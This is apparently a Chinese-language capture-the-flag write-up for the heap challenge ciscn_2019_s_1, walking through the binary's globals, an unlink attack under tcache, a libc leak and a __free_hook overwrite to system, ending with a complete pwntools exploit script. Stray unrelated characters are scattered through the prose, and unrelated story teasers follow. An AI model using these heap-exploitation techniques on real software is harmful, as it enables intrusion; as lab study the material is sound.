ciscn_2019_s_1

對(duì)數(shù)據(jù)挺敏感的一道題

1.檢查

checksec.png

2.反匯編

有四個(gè)功能

unsigned __int64 menu()
{
  unsigned __int64 v0; // ST08_8

  v0 = __readfsqword(0x28u);
  puts("1.malloc");
  puts("2.free");
  puts("3.edit");
  puts("4.show");
  return __readfsqword(0x28u) ^ v0;
}

ma()

ma().png

很平常的一個(gè)創(chuàng)建chunk的函數(shù)鸡岗,其中

0x6020E0 記錄了chunk的地址,0x602060記錄了chunk的大小狰贯,最多可以有32個(gè)chunk

ed()

ed().png

有了一個(gè)新的固定地址:0x6022BC

sh()

sh.png

這里也記錄下了一個(gè)新的地址:0x6022B8

3.思路

整理信息

幾個(gè)固定地址從低到高如下

地址 變量名
0x602060 len
0x6020E0 heap
0x6022B8 key2
0x6022BC key1
  • 創(chuàng)建chunk的時(shí)候,返回了chunk的地址赏廓,heap有用做管理chunk地址的全局指針涵紊,具有 Unlink 漏洞的特征
  • 要getshell,就要修改程序的got表幔摸,那么就要進(jìn)行信息泄露摸柄,但是 key2 鎖住了對(duì)sh()的使用,那么就必須修改 key2 的值既忆。發(fā)現(xiàn) key1 的地址和 key2 的相近驱负,就可以順便修改 key1的值嗦玖,從而可以多次使用ed()
  • 經(jīng)過(guò)遠(yuǎn)程測(cè)試可以發(fā)現(xiàn),可以連續(xù)對(duì)同一chunk使用fr跃脊,那么環(huán)境因該是 libc-2.27即以上的環(huán)境宇挫,BUUOJ中明確給出了環(huán)境為 Ubuntu18

攻擊思路

這里有兩種思路,具體看你對(duì)數(shù)據(jù)是否敏感

  1. 簡(jiǎn)單的是小伙伴cnitlrt的思路酪术,特殊點(diǎn)是發(fā)現(xiàn)bss端上(cnitlrt的簡(jiǎn)書(shū))

    如下

    .bss:0000000000602060 len_602060      dd 20h dup(?)           ; DATA XREF: ma+CA↑o
    .bss:0000000000602060                                         ; fr+AC↑o ...
    .bss:00000000006020E0                 public heap_6020E0
    .bss:00000000006020E0 ; void *heap_6020E0[32]
    .bss:00000000006020E0 heap_6020E0     dq 20h dup(?)           ; DATA XREF: ma+49↑o
    .bss:00000000006020E0                                         ; ma+B2↑o ...
    .bss:00000000006021E0                 public pro
    .bss:00000000006021E0 pro             db    ? ;
    .bss:00000000006021E1                 db    ? ;
    .bss:00000000006021E2                 db    ? ;
    .bss:00000000006021E3                 db    ? ;
    .....................                 ..    . .
    .bss:00000000006022B8                 public key2_6022B8
    .bss:00000000006022B8 key2_6022B8     dd ?                    ; DATA XREF: sh+17↑r
    .bss:00000000006022BC                 public key1_6022BC
    .bss:00000000006022BC key1_6022BC     dd ?                    ; DATA XREF: ed+17↑r
    .bss:00000000006022BC                                         ; ed+EC↑r ...
    .bss:00000000006022BC _bss            ends
    

    heap_6020E0中器瘪,每個(gè)chunk占8字節(jié),第32個(gè)就是 0x6020E0+832= 0x6021e0*绘雁,剛好在 pro 段上面橡疼,而 pro 段距離 key1 相差 0xD8,如果通過(guò) Unlink 到這里庐舟,直接 ma的時(shí)候向chunk中添加數(shù)據(jù)就可以直接覆寫(xiě) key1key2

    • 1. 使用 Unlink 修改 key1key2
    • 2. 泄露 free_hook_libc_system
    • 3. Tcache_Dup后調(diào)用 free_hook 得到shell
  2. 還有一種衰齐,來(lái)自于博客https://blog.csdn.net/qq_37433000/article/details/107026628

    這種方法非常復(fù)雜,但是不需要對(duì)數(shù)據(jù)太敏感继阻,通過(guò)在libc-2.27中的 chunk_overlapping 來(lái)修改 key1key2

這里先講第一種

4.GDB

1. 使用 Unlink 修改 key1key2

  • 1.為了之后得到unsortedbin耻涛,這里我們需要布局,同時(shí)這里的heap[32]->size瘟檩,決定了之后能覆蓋的大小

      #get unsorted bin
      for i in xrange(7):
          malloc(i,0xf8,str(i)*8)
      malloc(7,0xf8,'7'*8)
      malloc(32,0xf8,'20202020')
      malloc(8,0xf8,'8'*8)
      malloc(9,0xf8,"/bin/sh\x00")
    
  • 2.為了能夠覆蓋到 key1抹缕,這里就選最后一個(gè)chunk:heap[32]為要unlink的chunk

      addr = 0x6020e0+8*32
      payload = p64(0)+p64(0xf1)
      payload += p64(addr-0x18)+p64(addr-0x10)
      payload = payload.ljust(0xf0,"\x00")
      payload += p64(0xf0)
    
  • 3.先填滿tcache,要不然unlink不會(huì)是雙鏈表

      for i in xrange(7):
          free(i+1)
    
  • 4.Unlink攻擊

      edit(32,payload)
      free(8)
    
unlink.png

2. 泄露 free_hook_libc_system

  • 1.肯定要改寫(xiě)兩個(gè) key 的值

      payload = p64(0x0000000000601fa0)
      payload += p64(pro-0x18)+p64(pro-0x18)
      payload += p64(pro)
      payload = payload.ljust(0xf0,'\x00')
      payload += p64(0x0000000a00000001)
      edit(32,payload)
    

    之前我們把heap[32]改成了 0x6021C8墨辛,那這次就是直接對(duì)0x6021C8編輯卓研,反推算可以0x6021C8原本記錄的是heap[29],那這段payload就把heap[32]改成了 0x06021e0睹簇。同時(shí)該chunk距離 key 比較近奏赘,就可以改寫(xiě)

    leak.png
  • 2.直接調(diào)用sh

    leak-2.png

3. Tcache_Dup后調(diào)用 free_hook 得到shell

其實(shí)這個(gè)也不算啥攻擊方式,就是我們控制了一個(gè)指針

    edit(32,p64(free_hook))
    edit(32,p64(system))
    free(9)
    sh.interactive()

其實(shí)從上面那步就可以看出來(lái)太惠,每次對(duì)heap[32]進(jìn)行編輯時(shí)磨淌,我們都可以修改他得值,從而由 heap[32] -> free_hook凿渊,然后再次編輯就是在free_hook上面寫(xiě)了

5.exp

from pwn import *
elf = ELF("ciscn_s_1")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
sh = 0

def malloc(idx,sz,content):
    sh.sendlineafter("4.show\n","1")
    sh.sendlineafter("index:",str(idx))
    sh.sendlineafter("size:",str(sz))
    sh.recvuntil("gift: ")
    addr = u64(sh.recv(6).ljust(8,"\x00"))
    sh.sendafter("content:",content)
    return addr

def free(idx):
    sh.sendlineafter("4.show\n","2")
    sh.sendlineafter("index:",str(idx))

def edit(idx,content):
    sh.sendlineafter("4.show\n","3")
    sh.sendlineafter("index:",str(idx))
    sh.sendafter("content:",content)

def show(idx):
    sh.sendlineafter("4.show\n","4")
    sh.sendlineafter("index:",str(idx))

def main(ip,port,debug,mode):
    global sh
    if debug==0:
        context.log_level = "debug"
    else:
        pass
    if mode==0:
        sh = process("ciscn_s_1")
    else:
        sh = remote(ip,port)

    key1 = 0x06022BC
    key2 = 0x06022B8
    pro = 0x6021E0
    #get unsorted bin
    for i in xrange(7):
        malloc(i,0xf8,str(i)*8)
    malloc(7,0xf8,'7'*8)
    malloc(32,0xf8,'20202020')
    malloc(8,0xf8,'8'*8)
    malloc(9,0xf8,"/bin/sh\x00")

    addr = 0x6020e0+8*32
    payload = p64(0)+p64(0xf1)
    payload += p64(addr-0x18)+p64(addr-0x10)
    payload = payload.ljust(0xf0,"\x00")
    payload += p64(0xf0)
    
    for i in xrange(7):
        free(i+1)
    edit(32,payload)
    free(8)

    payload = p64(0x0000000000601fa0)
    payload += p64(pro-0x18)+p64(pro-0x18)
    payload += p64(pro)
    payload = payload.ljust(0xf0,'\x00')
    payload += p64(0x0000000a00000001)
    edit(32,payload)
    show(29)
    libc_base = u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-libc.sym["free"]
    free_hook = libc_base + libc.sym["__free_hook"]
    system = libc_base + libc.sym["system"]
    success("libc base ==> "+hex(libc_base))
    success("free_hook ==> "+hex(free_hook))
    success("_libc_system ==> "+hex(system))

    edit(32,p64(free_hook))
    edit(32,p64(system))
    free(9)
    sh.interactive()

if __name__ == '__main__':
    main(0,0,0,0)
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末梁只,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子埃脏,更是在濱河造成了極大的恐慌搪锣,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,372評(píng)論 6 498
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件彩掐,死亡現(xiàn)場(chǎng)離奇詭異构舟,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)堵幽,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,368評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門(mén)狗超,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)弹澎,“玉大人,你說(shuō)我怎么就攤上這事抡谐〔闷妫” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 162,415評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵麦撵,是天一觀的道長(zhǎng)刽肠。 經(jīng)常有香客問(wèn)我,道長(zhǎng)免胃,這世上最難降的妖魔是什么音五? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,157評(píng)論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮羔沙,結(jié)果婚禮上躺涝,老公的妹妹穿的比我還像新娘。我一直安慰自己扼雏,他們只是感情好坚嗜,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,171評(píng)論 6 388
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著诗充,像睡著了一般苍蔬。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上蝴蜓,一...
    開(kāi)封第一講書(shū)人閱讀 51,125評(píng)論 1 297
  • 那天碟绑,我揣著相機(jī)與錄音,去河邊找鬼茎匠。 笑死格仲,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的诵冒。 我是一名探鬼主播凯肋,決...
    沈念sama閱讀 40,028評(píng)論 3 417
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼造烁!你這毒婦竟也來(lái)了否过?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 38,887評(píng)論 0 274
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤惭蟋,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后药磺,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體告组,經(jīng)...
    沈念sama閱讀 45,310評(píng)論 1 310
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,533評(píng)論 2 332
  • 正文 我和宋清朗相戀三年癌佩,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了木缝。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片便锨。...
    茶點(diǎn)故事閱讀 39,690評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖我碟,靈堂內(nèi)的尸體忽然破棺而出放案,到底是詐尸還是另有隱情,我是刑警寧澤矫俺,帶...
    沈念sama閱讀 35,411評(píng)論 5 343
  • 正文 年R本政府宣布吱殉,位于F島的核電站,受9級(jí)特大地震影響厘托,放射性物質(zhì)發(fā)生泄漏友雳。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,004評(píng)論 3 325
  • 文/蒙蒙 一铅匹、第九天 我趴在偏房一處隱蔽的房頂上張望押赊。 院中可真熱鬧,春花似錦包斑、人聲如沸流礁。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,659評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)神帅。三九已至,卻和暖如春丸卷,著一層夾襖步出監(jiān)牢的瞬間枕稀,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,812評(píng)論 1 268
  • 我被黑心中介騙來(lái)泰國(guó)打工谜嫉, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留萎坷,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 47,693評(píng)論 2 368
  • 正文 我出身青樓沐兰,卻偏偏與公主長(zhǎng)得像哆档,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子住闯,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,577評(píng)論 2 353